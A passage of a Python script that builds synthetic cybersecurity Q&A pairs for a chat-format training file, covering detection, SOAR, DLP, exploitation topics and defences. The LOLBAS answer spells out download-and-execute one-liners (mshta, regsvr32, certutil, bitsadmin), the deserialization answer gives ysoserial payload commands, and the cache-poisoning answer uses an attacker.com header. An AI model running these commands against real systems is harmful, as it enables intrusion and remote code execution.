  "Detection engineering using MITRE ATT&CK: for each ATT&CK technique relevant to your threat model, build detection rules. Process: (1) Prioritise techniques: identify threat actors targeting your sector; pull their ATT&CK techniques from ATT&CK Groups page; focus detection on most likely techniques (not all 700+). (2) Research data sources: ATT&CK technique page lists data sources required for detection (Process Creation for T1059 Command and Scripting Interpreter; Network Traffic for T1071 C2); ensure those sources are collected. (3) Write detection rule: test-driven approach: set up lab; execute technique; observe artifacts; write rule to catch those artifacts; verify rule fires; test against clean baseline to check FP rate. (4) Validate: run test tool like Atomic Red Team (atomicredteam.io) which has test scripts for each ATT&CK technique; run atomic test; confirm detection fires. Example detection for T1003.001 (LSASS Memory): Sysmon Event 10 (ProcessAccess) where TargetImage contains lsass.exe and GrantedAccess = 0x1010 or 0x1038 (read process memory); Sigma rule: logsource -- category: process_access windows; detection -- selection: TargetImage: '*\\lsass.exe'; GrantedAccess: '0x1010|0x1038'; filter: SourceImage: 'C:\\Windows\\*'; condition: selection and not filter. Sigma: vendor-agnostic detection rule language; write once, convert to Splunk SPL, Elastic KQL, QRadar AQL, Microsoft Sentinel KQL; Sigma HQ GitHub has thousands of community rules. ATT&CK Navigator coverage: import rules into Navigator; colour-code by detection confidence; identify gaps; visualise coverage vs threat actor techniques. Continuous improvement: threat hunt finds new TTP; new rule written; added to detection library; coverage increases.")

p("What is SOAR (Security Orchestration, Automation, and Response)?",
  "SOAR: platforms that automate security operations workflows, integrate security tools, and orchestrate response actions. Components: (1) Orchestration: connect disparate security tools via APIs; Splunk SOAR (formerly Phantom), Palo Alto XSOAR, Microsoft Sentinel SOAR, Swimlane, IBM Resilient; pre-built integration apps for 300+ tools (VirusTotal, SentinelOne, CrowdStrike, ServiceNow, Jira). (2) Automation: run automated actions without human intervention; trigger on SIEM alert; run enrichment, containment, notification automatically; reduce MTTR (mean time to respond) from hours to minutes. (3) Case Management: centralise incident data; investigation notes; evidence; analyst assignment; SLA tracking. Playbooks: defined workflows for specific alert types; common SOAR playbooks: Phishing response: alert received -> extract URLs/attachments -> check VirusTotal -> if malicious: block URL on proxy, isolate endpoint, notify user, create ticket, notify manager; Malware alert: alert -> get process info from EDR -> check hash -> if known malicious: isolate host, dump memory, create P1 incident ticket, page on-call analyst; Brute force: alert -> get source IP -> check reputation -> if external: block IP on firewall, add to watchlist -> check if any account successfully authenticated during spray -> if yes: disable account, force password reset. Automation value: eliminate repetitive analyst tasks; L1 spends 40% of time on alert triage that can be automated; reduce analyst burnout; increase alert handling capacity; ensure consistent response (humans skip steps under pressure, playbooks do not). Metrics: alerts handled per analyst per day (before/after SOAR); MTTD/MTTR improvement; automation rate (% of alerts fully automated without human action).")

p("How do you implement a data loss prevention (DLP) program?",
  "DLP (Data Loss Prevention): tools and processes to prevent sensitive data from leaving the organisation without authorisation. Data classification: first, classify data by sensitivity (Public, Internal, Confidential, Restricted/Secret); tag documents with metadata; DLP policies enforce rules based on classification. Content inspection techniques: regular expressions (regex): credit card patterns (16 digits, Luhn algorithm valid), SSN (XXX-XX-XXXX), passport numbers; keyword matching (secret, classified, confidential); fingerprinting (hash of sensitive document; detect copies even if reformatted); machine learning classification. DLP deployment points: Network DLP: inline on email gateway, web proxy, upload traffic; inspect outbound for sensitive content; block or quarantine; alert analyst; endpoint DLP: agent on laptop; monitor file copy to USB, upload to cloud storage (Google Drive personal, Dropbox), print, screen capture; Cloud DLP (CASB -- Cloud Access Security Broker): API integration with cloud services (Microsoft 365, Google Workspace, Box); monitor and control data in cloud; also intercept cloud access from browser. Common DLP use cases: PCI DSS (prevent cardholder data exfiltration); HIPAA (PHI protection); IP protection (source code, formulas, strategic plans); GDPR (EU personal data). Email DLP: inspect outbound email body and attachments; prevent sending PII to personal email; detect accidental or malicious data egress; Microsoft Purview Information Protection, Proofpoint DLP, Mimecast. Challenges: false positives (financial reports legitimately contain credit card patterns); encryption (DLP cannot inspect encrypted content it does not control -- endpoint agent required); encryption-in-transit (need SSL inspection for HTTPS traffic); user experience impact (quarantine delays legitimate email). Incident handling: DLP alert -> review content -> determine intent (accidental vs malicious) -> escalate if malicious -> coordinate with HR/legal.")

# ── ADVANCED SECURITY TOPICS ──────────────────────────────────────────────────

p("Explain memory-safe languages and why they matter for security.",
  "Memory safety: programs written in C and C++ are vulnerable to memory corruption bugs (buffer overflows, use-after-free, double free, null dereference) because they give programmers direct memory control without automatic bounds checking. Security impact of memory unsafety: ~70% of vulnerabilities in Microsoft products, Google Chrome, and Android are memory safety bugs; exploited for RCE, privilege escalation, information disclosure; entire exploit categories (stack/heap overflow, ROP chains) exist because of memory unsafety. Memory-safe languages: Rust: systems programming language with compile-time memory safety guarantees via ownership, borrowing, and lifetimes; no garbage collector (zero-cost abstraction); unsafe blocks allowed when needed; increasingly adopted for OS kernels (Linux 6.1 added Rust), browsers (Firefox components), embedded systems; AWS, Google, Microsoft, Cloudflare using Rust for security-critical code. Go: garbage-collected; bounds checking; no pointer arithmetic; null-safe type system (no null pointers, uses zero values); simpler than Rust; Kubernetes, Docker, many cloud-native tools. Java, Python, C#: garbage-collected; bounds-checked arrays; no raw pointer manipulation; historically safe from memory bugs but have other vulnerability classes (injection, deserialization). Memory safety enforcement options for C/C++: Address Sanitizer (ASan): compile-time instrumentation detecting buffer overflows, use-after-free at runtime; used in testing but too slow for production. Control Flow Integrity (CFI): limits valid call targets; reduces ROP gadget exploitation. GCC/Clang -fstack-protector: stack canary detects stack buffer overflows. US CISA and NSA recommend memory-safe languages for new code; Biden Executive Order 14028 promotes secure software development.")

p("What is fuzzing and how is it used for vulnerability research?",
  "Fuzzing (fuzz testing): automated technique sending random, malformed, or unexpected input to a program to find crashes, hangs, or unexpected behavior indicating vulnerabilities. Types: (1) Black-box fuzzing (dumb fuzzing): send completely random data to target; simple; low coverage; find obvious bugs. (2) Mutation-based: start with valid inputs; mutate them (flip bits, change values, insert bytes); more targeted than random; common for file format fuzzing. (3) Generation-based: generate inputs from specification/grammar; valid structure but with invalid values; better for complex protocols. (4) Coverage-guided (grey-box): instrument program to track which code paths executed; guide fuzzer to explore new paths; most effective; foundation of modern fuzzing. Coverage-guided tools: AFL++ (American Fuzzy Lop++): state of the art; instruments binary or source; genetic algorithm to evolve inputs; find memory corruption bugs; used to find thousands of CVEs. LibFuzzer: in-process fuzzer; part of LLVM; target function receives random bytes; fast (no process spawn per test case); used by Chromium, OpenSSL, many projects. Honggfuzz: supports hardware-based coverage; works with closed-source binaries. OSS-Fuzz: Google continuous fuzzing for critical open-source; fuzzes 1000+ projects; found 10,000+ vulnerabilities. Targets: file parsers (images, documents, PDF, audio -- high attack surface, complex parsing); network protocol implementations; compression libraries; cryptographic libraries; operating system kernels. Sanitizers: compile with ASan (detect buffer overflows), UBSan (undefined behavior), MemorySanitizer (uninitialised reads); without sanitizers, many bugs cause silent misbehavior rather than crash. Crash triage: deduplicate crashes (address-based or stacktrace-based); asan output shows allocation/free stack for UAF; root cause analysis for exploit development.")

p("How do you exploit UEFI firmware vulnerabilities?",
  "UEFI (Unified Extensible Firmware Interface): modern firmware replacing BIOS; more powerful, complex, and attackable. Attack surface: (1) SPI flash: UEFI firmware stored in SPI flash chip; if SPI write protection misconfigured (chipset registers), attacker with kernel access can overwrite firmware. (2) Secure Boot bypass: Secure Boot verifies bootloader and OS kernel signatures; bypasses: revoked but still accepted EFI binaries (BlackLotus exploits CVE-2023-24932 -- Windows Secure Boot bypass); BootHole (CVE-2020-10713) buffer overflow in GRUB2 bootloader; vendor-specific vulnerabilities in Secure Boot implementation; MOK (Machine Owner Key) enrollment abuse. (3) SMM (System Management Mode) vulnerabilities: CPU enters SMM on SMI (System Management Interrupt); executes firmware code at highest privilege (ring -2); if SMM code has vulnerabilities (buffer overflows in SMM handlers), attacker from ring 0 (OS kernel) can execute code in SMM; SMM code can modify UEFI and bypass all OS-level security. Notable UEFI malware: LoJax (2018, APT28): first in-wild UEFI rootkit; persistence survives OS reinstall and disk replacement; modified legitimate Lojack (anti-theft) firmware; replaces SPI flash. BlackLotus (2023): first in-wild Secure Boot bypass; runs on fully-patched Windows 11; disables Bitlocker, Defender, Hypervisor-Protected Code Integrity; sold on dark web as crimeware kit. MoonBounce (2022, APT41): UEFI implant in SPI flash firmware. Detection: fwupd/LVFS firmware version tracking; chipsec security checker for UEFI vulnerabilities; BIOS Integrity Measurement (BIM); EDR agent reports UEFI hash changes. Defense: enable Secure Boot with UEFI Secure Boot; keep firmware updated; enable SMM_BWP (BIOS Write Protect); Intel Boot Guard fuses (one-time programmable root of trust).")

p("Explain kernel exploitation techniques.",
  "Kernel exploitation: compromising the operating system kernel to achieve ring 0 privilege from user space. Why valuable: kernel compromise = full system control; disable security software; load rootkit; read any process memory; persist through reboots. Linux kernel vulnerabilities: race conditions (TOCTOU -- time-of-check-time-of-use in system calls); use-after-free in kernel objects (slab allocator exploitation); integer overflows in privilege checks; type confusion in ioctl handlers; null pointer dereference (mmap NULL page was exploitable pre-mmap_min_addr). CVE examples: Dirty Cow (CVE-2016-5195): race condition in copy-on-write; write to read-only memory mapped file; root from any user; very reliable; widespread exploitation. Dirty Pipe (CVE-2022-0847): Linux kernel 5.8-5.16; write to arbitrary files including /etc/passwd and SUID binaries; root privesc; fast and reliable. Overlayfs (CVE-2023-0386): local privilege escalation; widespread in Ubuntu, container environments. Windows kernel exploitation: KASLR (Kernel Address Space Layout Randomization): kernel base address randomised; must leak kernel address (e.g., via NtQuerySystemInformation, user-to-kernel memory disclosure); Pool corruption: non-paged pool and paged pool; overflow pool header corrupts adjacent allocations; Windows 10+ pool hardening made more difficult; Exploited in wild: CVE-2021-34527 PrintNightmare, CVE-2022-21882 Win32k EoP. Kernel protections: SMEP (Supervisor Mode Execution Prevention): kernel cannot execute user-space code; ROP required; SMAP (Supervisor Mode Access Prevention): kernel cannot read/write user-space without explicit permission; KPTI (Kernel Page Table Isolation): meltdown mitigation; kernel and user page tables separated; KASLR + kASLR bypass via leaks. Mitigations making exploitation harder: lockdown LSM (Linux 5.4+); seccomp; kernel CFI (Clang-based Control Flow Integrity in Android kernel).")

p("What are the security considerations for embedded systems and IoT?",
  "Embedded/IoT security challenges: resource constraints (limited CPU, RAM, no MMU on some); long lifecycle (10-20 years, infrequent updates); physical access; network connectivity (attack surface without traditional security tooling). Common vulnerabilities: (1) Default credentials: admin/admin, admin/password, root/root, empty password; botnets (Mirai) compromised 600,000 routers/cameras with default credentials; enumerate via Shodan; test with Hydra. (2) Outdated firmware: vendor stops supporting product; known CVEs never patched; check firmware version against CVE database. (3) Unencrypted update channels: firmware downloaded over HTTP; MITM injects malicious firmware; verify signature before installing. (4) Hardcoded backdoors: vendor leaves debug accounts (user: admin, password: Sup3r5ecret123) for manufacturing; often found via firmware reverse engineering. (5) Exposed debugging interfaces: JTAG, UART serial port exposed on PCB; physical access yields root shell; common on routers, IP cameras. (6) Insecure protocols: Telnet instead of SSH; FTP instead of SFTP; HTTP instead of HTTPS; no TLS on MQTT. (7) Memory corruption: C/C++ firmware without protections; buffer overflows in parsing HTTP headers, UPnP, SNMP. Firmware analysis: download from vendor website; binwalk -e firmware.bin (extract filesystems); Squashfs/JFFS2 extraction; strings for hardcoded credentials and URLs; Ghidra for reverse engineering custom code; EMBA (embedded analyzer tool) automated. Attack tools: routersploit (exploit framework for embedded devices); Shodan for discovery; nmap for port scanning. Secure design: secure boot (verify firmware signature); encrypted storage; secure OTA update channel; ASLR/NX if architecture supports; principle of least functionality.")

p("Explain how modern antivirus and EDR solutions detect malware.",
  "AV/EDR detection layers: (1) Static analysis: file hash matching against known malware database; fast but misses polymorphic/metamorphic malware; vendor updates signatures continuously. YARA rules: pattern matching on byte sequences and strings; detect malware families by characteristic patterns even in modified samples. Machine learning on PE headers: entropy, import table, section names, size anomalies; detect packed malware (high entropy sections) and unusual imports. (2) Dynamic/Behavioral analysis: sandbox execution: detonate sample in isolated VM; observe behavior: file creation, registry changes, network connections, process injection; Cuckoo Sandbox, Joe Sandbox, Any.run, Hybrid Analysis; sandboxes subject to evasion (check for VM artifacts). Behavior monitoring (EDR): hook system calls at kernel level; monitor process creation, file operations, registry, network, memory allocation; alert on suspicious patterns: word.exe spawning cmd.exe; powershell.exe with encoded commands; process injection (WriteProcessMemory + CreateRemoteThread); mass file rename (ransomware). (3) Memory scanning: scan running process memory for known malware signatures or suspicious patterns; detect fileless malware that never touches disk; Malfind (Volatility): MZ header in unexpected memory regions with execute bit. (4) Network detection: C2 traffic signatures in IDS/IPS; JA3 TLS fingerprints; DNS request patterns; anomalous outbound connections. (5) AMSI (Antimalware Scan Interface): OS hook for PowerShell, VBScript, JScript; script content scanned before execution; catches obfuscated malicious scripts; attackers attempt AMSI bypass. (6) ML-based anomaly: baseline normal behavior; alert on deviations; reduces reliance on signatures; catches unknown threats.")

p("What is Living Off the Land (LOLBAS) and how do attackers use it?",
  "LOLBAS (Living Off the Land Binaries And Scripts): attackers use legitimate OS binaries and scripts to execute malicious actions; evades detection because legitimate tools are whitelisted. Why effective: Windows signed binaries trusted by AV/EDR; execution via legitimate process (wscript.exe, cscript.exe, regsvr32.exe) blends with normal activity; defender whitelists common system tools. Examples: Execution: rundll32.exe javascript:; (execute JavaScript); mshta.exe http://url/payload.hta (HTA application, bypasses AppLocker in some configs); regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll (Squiblydoo technique -- regsvr32 fetches and executes COM scriptlet); wmic process call create cmd.exe /c whoami (remote process creation via WMI); certutil.exe -urlcache -f http://url/payload.exe C:\\Windows\\Temp\\p.exe (download file via certutil); bitsadmin /transfer job /download /priority high http://url/payload.exe C:\\Temp\\p.exe (BITS transfer). Download: certutil -decode base64file.txt decoded.exe; expand archive.cab .; PowerShell -enc BASE64 (encoded command bypasses simple command line monitoring). Lateral movement: PsExec (legitimate admin tool); wmic /node:TARGET process call create cmd.exe; winrs -r:TARGET cmd.exe. Persistence: schtasks /create (scheduled task); reg add HKCU\\...\\Run /v startup /d payload.exe (registry run key -- legitimate registry tool). Bypass: installutil.exe (execute .NET assembly bypassing AppLocker); msbuild.exe project.xml (execute C# from MSBuild project). Detection: monitor commonly abused LOLBAS with unusual command lines; parent-child process anomalies; Microsoft Defender for Endpoint has LOLBAS detection built-in. LOLBAS project (lolbas-project.github.io): comprehensive catalog of LOLBins with examples.")

p("How do you detect and prevent lateral movement in a network?",
  "Lateral movement detection strategies: (1) Windows event log monitoring: Event 4624 (logon) Type 3 (network) from unexpected sources -- workstation connecting to workstation via SMB; Event 4648 (explicit credential logon) -- process logging on with different credentials than session; Event 7045 (new service installed) -- PsExec creates service; correlation: source workstation IP authenticating to multiple targets in short window. (2) Process execution anomalies: Sysmon Event 1 (process create) with parent process = wsmprovhost.exe (WinRM), WmiPrvSE.exe (WMI), services.exe from remote session; wscript.exe, cscript.exe spawning from unexpected parents. (3) Network-based detection: SMB connections from workstations to other workstations (normal SMB is workstation to file server); admin share access (C$, ADMIN$, IPC$) from unexpected sources; WinRM connections (port 5985/5986) between hosts; Pass-the-Hash pattern: same credential successful on multiple hosts in rapid succession. (4) Named pipe analysis: lateral movement tools create named pipes (PsExec: \\PIPE\\PSEXESVC; Cobalt Strike: \\PIPE\\msagent, \\PIPE\\status_); Sysmon Event 17/18 for pipe creation and connection. Prevention: network segmentation (block SMB port 445 between workstations; block WinRM between non-admin hosts); LAPS (unique local admin passwords per host -- prevents spreading with same local admin hash); Privileged Access Workstations (PAWs -- admins can only RDP from designated PAW machines; PAW reaches any admin target); Credential Guard (prevents hash extraction for PtH); Protected Users group (members cannot use NTLM; limits PtH to NTLM-only services). CrowdStrike Falcon / Defender for Identity built-in lateral movement detection using ML on authentication patterns.")

p("What security controls should be in place for privileged access management?",
  "Privileged Access Management (PAM): security controls for protecting and monitoring privileged accounts (domain admins, root, service accounts, database admins, cloud admin roles). Components: (1) Privileged Account Discovery: inventory all privileged accounts; many organisations have 3-5x more than expected; service accounts, shared admin accounts, forgotten local admin accounts. (2) Vault and rotation: store privileged credentials in encrypted vault (CyberArk, BeyondTrust, Thycotic/Delinea); rotate passwords automatically (daily or per-session); users check out credentials for limited duration; no one knows permanent passwords; eliminate hardcoded credentials in scripts and applications. (3) Just-in-Time (JIT) access: elevate to privileged role only when needed; request access for specific task; approve (manager, security team, automated policy); time-limited (2 hours, 8 hours); revoke automatically; Microsoft PIM (Privileged Identity Management) for Azure AD. (4) Session recording: record all privileged sessions (video and keystroke logging); searchable; audit trail; CyberArk PSM (Privileged Session Manager) proxies sessions; detect and alert on anomalous commands. (5) Tier model (Microsoft): Tier 0 (Domain Controllers, AD Admin roles -- highest trust); Tier 1 (Server admins, enterprise applications); Tier 2 (Workstation admins, user support); admin accounts have separate accounts per tier; Tier 0 admins cannot log into Tier 2 systems (contamination risk). (6) Privileged Access Workstations (PAWs): dedicated hardened workstations for admin tasks; no internet browsing or email; separate from general use computers; phishing-resistant MFA for admin access. Metrics: all privileged accounts in vault (%); rotation compliance; JIT adoption rate; session recording coverage; account usage anomalies.")

p("Explain the security considerations for serverless and container architectures.",
  "Serverless security (AWS Lambda, Azure Functions, Google Cloud Functions): attack surface: function code vulnerabilities (injection, dependency vulnerabilities); event data injection (SNS, SQS, API Gateway trigger data); overly permissive IAM roles; sensitive data in environment variables (visible in console); function-to-function attack (if one function compromised, pivot to others via shared IAM role); cold start timing attacks. Best practices: least privilege IAM role per function (not shared role); no sensitive data in environment variables (use SSM Parameter Store or Secrets Manager); input validation on all trigger event data; limit function timeout and memory; VPC isolation for functions accessing internal resources; enable CloudTrail for all Lambda invocations; use Lambda Powertools for structured logging with redaction of sensitive fields. Container security (Docker/Kubernetes): multi-layered security model: build time (image scanning with Trivy, Snyk -- CVEs in base image and packages), deploy time (admission controllers validate pod security, no privileged containers), runtime (Falco for system call anomaly detection). Pod Security Standards (Kubernetes): Privileged (no restrictions), Baseline (minimum restrictions, no privileged), Restricted (hardened -- no root, read-only root filesystem, no host namespace sharing); enforce via Pod Security Admission controller. Runtime protection: Falco (CNCF project): eBPF-based monitoring of system calls inside containers; alert on shell spawned in container, file write to unexpected path, sensitive file access; Sysdig Secure, Aqua Security for commercial runtime protection. Image security: scan images in CI pipeline before push; sign images (cosign, Notary); use minimal base images (distroless, Alpine -- smaller attack surface); never run as root inside container; no secrets in Dockerfile or image layers.")

p("What is threat intelligence sharing and what standards exist?",
  "Threat intelligence sharing: organisations and governments exchange threat indicators and attack information to collectively improve defenses. Benefits: one organisation learns from another's breach; defenders share IOCs before attackers reuse infrastructure; scale (small organisations benefit from larger organisations' intelligence). Sharing communities: ISACs (Information Sharing and Analysis Centers): sector-specific sharing; FS-ISAC (financial services); H-ISAC (healthcare); E-ISAC (energy); MS-ISAC (state/local government); membership required, often free for critical sectors. CISA: US government shares threat intelligence publicly (US-CERT alerts, AA## reports, Known Exploited Vulnerabilities catalog); AIS (Automated Indicator Sharing) -- machine-speed sharing of indicators with critical infrastructure owners. Vendor threat intel: Mandiant Advantage, CrowdStrike Adversary Intelligence, Recorded Future, Intel471; paid; richer context and attribution. Technical standards: STIX (Structured Threat Information eXpression): JSON-based format for expressing threat data; Objects: Indicator (IOC), TTP (technique), Campaign, Threat Actor, Malware, Vulnerability, Relationship; links objects to express relationships (campaign uses malware, threat actor uses TTP). TAXII (Trusted Automated eXchange of Indicator Information): transport protocol for STIX over HTTPS; pull (client polls server for new indicators), push (server pushes to clients); Collections and Channels. MISP (Malware Information Sharing Platform): open-source threat intelligence sharing platform; popular in government and critical infrastructure; STIX/TAXII compatible; correlation engine; taxonomies (tlp: traffic light protocol -- white, green, amber, red -- sharing scope). TLP (Traffic Light Protocol): TLP:RED (recipient only, not forward); TLP:AMBER (limited sharing within organisation and need-to-know partners); TLP:GREEN (community sharing); TLP:CLEAR (public).")

p("How do you build a secure software development lifecycle (SSDLC)?",
  "SSDLC integrates security at every phase of software development rather than testing at end. Phases: (1) Requirements: security requirements alongside functional requirements; abuse cases (how could an attacker misuse this feature?); regulatory requirements (GDPR data minimisation, PCI DSS encryption); threat modeling to identify risks early. (2) Design: security architecture review; apply security design patterns (defence in depth, least privilege, fail secure, separation of duties); threat model update; design approval gate for security risks. (3) Development: secure coding standards and guidelines (language-specific -- OWASP Cheat Sheet Series); pre-commit hooks for secrets detection (truffleHog, git-secrets); IDE security plugins (SonarLint, Checkmarx IDE plugin -- real-time feedback); peer code review checklist includes security; developer security training (OWASP Top 10, language-specific vulnerabilities). (4) Testing: SAST in CI (Semgrep, CodeQL -- runs on every PR; fail on new Critical/High findings); DAST against test environment (ZAP, Burp); SCA for dependency vulnerabilities (Snyk, Dependabot); secret scanning (GitHub Advanced Security, TruffleHog); infrastructure as code scanning (tfsec for Terraform, Checkov). (5) Deployment: security in deployment pipeline; image scanning before container deployment; infrastructure configuration validation; secrets management (not hardcoded, from vault); deployment approval for production changes. (6) Operations: runtime monitoring (RASP, WAF, EDR); vulnerability management (periodic scanning, CVE monitoring); penetration testing (annual external pentest, continuous bug bounty); incident response readiness. Metrics: DAST findings per sprint; time to fix Critical SAST findings; security training completion rate; mean time to patch Critical CVEs.")

p("Explain how bug bounty programs work and how to be effective in them.",
  "Bug bounty programs: organisations pay security researchers for reporting valid vulnerabilities. Platforms: HackerOne, Bugcrowd, Intigriti, Synack (curated/private), Cobalt.io; some programmes run directly on company website. Programme types: Private (invitation-only; less competition; easier to find bugs); Public (anyone can participate; most bugs found but also most competition and noise). Scope: defines what can be tested (domains, IP ranges, applications, mobile apps); out-of-scope assets (third-party services, employee personal accounts); out-of-scope vulnerability classes (denial of service, physical attacks, social engineering in most programmes). Rewards: typically by severity: Critical ($10,000-$100,000+); High ($2,000-$10,000); Medium ($500-$2,000); Low ($100-$500); Informational ($0); top programmes (Google, Microsoft, Apple, Meta) pay $100K+ for exceptional findings. Methodology for success: start with reconnaissance (identify all in-scope assets, not just obvious targets); focus on less-tested areas (mobile apps, APIs, new features); learn the application's specific attack surface; look for business logic flaws (harder to detect with automated scanners); read previous public disclosures and CVEs for the same organisation (find variants). Reporting: clear, concise title; description of vulnerability class; step-by-step reproduction instructions; proof of concept (screenshot, HTTP request/response, video); impact statement (what could attacker do?); suggested remediation. Common mistakes: report duplicates (check if already reported); out-of-scope issues; missing evidence; unrealistic impact claims; aggressive follow-up before triage window. Responsible disclosure: report to vendor first; wait for fix (typically 90 days per Google Project Zero standard); coordinate public disclosure.")

p("How do you exploit web cache poisoning?",
  "Web cache poisoning: manipulate cached response to serve malicious content to other users. How caches work: reverse proxy (CDN, Varnish, Nginx caching) stores responses keyed by URL and some headers; serves cached response to subsequent requests matching cache key; time-to-live (TTL) determines how long cached. Cache poisoning attack: inject malicious content in a response that gets cached; subsequent users receive poisoned cache entry. Requirements: (1) Identify cache key: what determines cache key? URL, Host header, Accept-Encoding, Cookie (some headers are unkeyed -- not part of cache key but included in response). (2) Unkeyed headers: if cache keys on URL only but server uses X-Forwarded-Host to construct redirect URLs: send request with X-Forwarded-Host: attacker.com; cache stores response reflecting attacker.com in Location header; subsequent users get redirect to attacker.com. (3) Parameter cloaking: cache keys on ?key=value; send ?key=value&utm_source=PAYLOAD; utm_source is unkeyed; server processes all parameters; payload reflected in response; cache stores with key on first param only. (4) Host header poisoning: if unkeyed and reflected in password reset link: send Host: attacker.com; victim who requests password reset has link pointing to attacker.com; receive token at attacker-controlled server. (5) HTTP response splitting: inject CRLF characters to add malicious headers to cached response. Finding unkeyed inputs: Param Miner (Burp extension) -- automatically discovers unkeyed headers and parameters; sends requests with varied headers and detects which affect response without changing cache key. Impact: cache-poisoned XSS affects all users loading cached page; cache-poisoned redirect for phishing; cache deception (force caching of authenticated response). Defense: validate and sanitise all inputs reflected in response; ensure all response-influencing headers are in cache key; set Vary header correctly.")

p("What is deserialization and how do you find insecure deserialization vulnerabilities?",
  '''Deserialization: converting byte stream back to object; inverse of serialisation (object to bytes for storage or transmission). Insecure deserialization (OWASP A08): application deserialises untrusted data; attacker manipulates serialised data to attack application. How to find: (1) Identify serialised data in HTTP traffic: Burp Proxy -- look for base64-encoded data in cookies, POST bodies, hidden form fields; Java serialised objects: bytes starting with rO0 (base64) or 0xACED0005 (hex magic bytes); .NET ViewState: /wEy... prefix; Python Pickle: opcode starts with c (callable) or ( for tuples; PHP serialised strings: O:8:UserData:{...} format. (2) Test modification: change serialised object property (role, isAdmin, userId); observe if application respects modified values -- object injection vulnerability even without RCE. (3) Test for gadget chains: for Java, use ysoserial to generate payload: java -jar ysoserial.jar CommonsCollections6 whoami | base64; send as serialised Java object in place of original; if vulnerable and gadget chain available, command executes. (4) PHP object injection: change __PHP_Incomplete_Class to a class with magic methods (__wakeup, __destruct, __toString) that perform dangerous operations; search source code for classes with magic methods + dangerous operations (exec, eval, file write). Finding blind deserialization: if no output visible, use DNS callback: java -jar ysoserial.jar URLDNS http://unique-id.burpcollaborator.net | base64; send payload; check Collaborator for DNS lookup; confirms deserialization occurs. Remediation: never deserialise untrusted input; if must, use allowlists of acceptable classes (Java deserialization filter); use safe formats (JSON, XML with schema validation) instead of native serialisation; digital signatures/HMAC on serialised data before deserialising.''')

p("Explain security testing for smart contracts on Ethereum.",
  "Smart contract security: programs deployed on blockchain (Ethereum, Solana, etc.); immutable after deployment; high financial stakes (DeFi protocols hold billions). Common vulnerabilities: (1) Reentrancy: contract A calls contract B; B calls back into A before A finishes; A state not updated yet; B withdraws multiple times; DAO hack (2016, $60M). Defense: Checks-Effects-Interactions pattern (update state before external calls); ReentrancyGuard modifier (mutex). (2) Integer overflow/underflow: Solidity <0.8.0 did not auto-revert on overflow; 255 + 1 = 0 for uint8; use SafeMath library or Solidity 0.8+. (3) Access control: functions missing onlyOwner or similar modifier; anyone can call admin functions; transfer ownership to address(0) accidentally. (4) Oracle manipulation: smart contracts use price oracles (Chainlink, Uniswap TWAP); if attacker manipulates spot price (flash loan attack), oracle provides wrong price; borrow much more than collateral worth. (5) Flash loan attacks: borrow large amount from flash loan protocol (no collateral if repaid in same transaction); manipulate markets; exploit price oracle; repay loan; profit; $100M+ stolen across multiple protocols. (6) Front-running: Ethereum mempool is public; attacker sees pending transaction, submits same transaction with higher gas fee; executes first; sandwich attacks on DEX trades. (7) Timestamp dependence: block.timestamp controllable by miners within 15 seconds; do not use for randomness or time-sensitive logic. Testing tools: Slither (static analysis -- detects reentrancy, access control, other patterns); Mythril (symbolic execution); Echidna (fuzzing -- property-based); Foundry/Hardhat for unit tests; Forta (runtime attack detection); formal verification (Certora Prover). Auditing: major protocols pay $50K-$1M for security audits before launch; bug bounties (Immunefi) pay millions for critical smart contract vulnerabilities.")

p("How do you perform hardware security assessment?",
  "Hardware security assessment: evaluate physical devices for vulnerabilities. Physical inspection: open device; document PCB (Printed Circuit Board) components; identify: processor (ARM, MIPS, x86), SoC, memory chips (eMMC, NAND flash), debugging headers (JTAG, SWD, UART). UART serial console: most embedded devices have UART debug port; 3-4 pins (TX, RX, GND, optional VCC); find with multimeter (GND = continuity to ground; TX = active with data during boot; VCC = 3.3V or 5V); connect USB-to-UART adapter (FTDI FT232R); open minicom or screen at 115200 baud; watch boot log; often drops to root shell without authentication. JTAG debugging: JTAG (Joint Test Action Group): boundary scan interface for testing and debugging; JTAG TAP (Test Access Port) -- TDI, TDO, TCK, TMS, TRST; identify pinout with JTAGulator (hardware tool) or openocd + JTAGulator firmware; connect with OpenOCD + GDB: read/write memory, halt processor, extract firmware, patch code at runtime. Chip-off / eMMC reading: remove storage chip from board; use chip reader (Easy JTAG, RT-SE9, Medusa Pro for BGA chips); read raw flash memory; extract filesystem; find credentials, keys, firmware. Fault injection: voltage glitching (undershoot VCC briefly to cause processor to skip instruction); clock glitching (inject faster clock pulse to confuse pipeline); used to bypass secure boot, extract AES keys; equipment: ChipWhisperer (open-source). Side-channel attacks: power analysis (measure current during AES key schedule; correlate with key hypothesis); EM (electromagnetic) analysis; timing attacks on constant-time implementations. Cryptographic key extraction: differential power analysis on smartcards and HSMs; academic attacks on specific hardware; ChipWhisperer framework for power analysis.")

p("What is mobile malware and how does it operate?",
  "Mobile malware types and operation: Android malware: APK files distributed via third-party app stores, phishing links, compromised legitimate apps, drive-by download. Types: (1) Stalkerware: monitors user location, calls, messages; often marketed as parental control; privacy violation; hides icon; accesses contacts, SMS, camera, microphone. (2) Banking trojans: overlay attack -- shows fake login screen over legitimate banking app; captures credentials; Anubis, Alien, Cerberus, Teabot; request Accessibility Service permission (grants broad UI control); steal 2FA SMS codes; Bankbot family stole from 1000+ banks. (3) Ransomware: encrypts files; demands payment; Android limited filesystem access restricts encryption to user-accessible files; ScreenLocker variant locks screen instead. (4) SMS/Call premium fraud: send SMS to premium numbers; subscribe to premium services; generate revenue for attacker; user gets bill. (5) RAT (Remote Access Trojan): full device control; camera/mic access; location tracking; SpyNote, GravityRAT. (6) Adware: display persistent ads; less malicious but annoying; often in fake app stores. Persistence: Android: foreground service (shows notification, prevents system killing); receive BOOT_COMPLETED broadcast to restart on reboot; Device Admin privilege (hard to uninstall). iOS: more restricted; malware less common; generally requires jailbreak or enterprise certificate abuse; MDM profiles used for monitoring; XcodeGhost (2015) supply chain attack on iOS apps compiled with malicious Xcode version. Detection: Google Play Protect scans apps; VirusTotal Mobile; MobSF for analysis; review permissions requested; check battery/data usage by app; unknown app sources indication.")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f COMPLETE -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
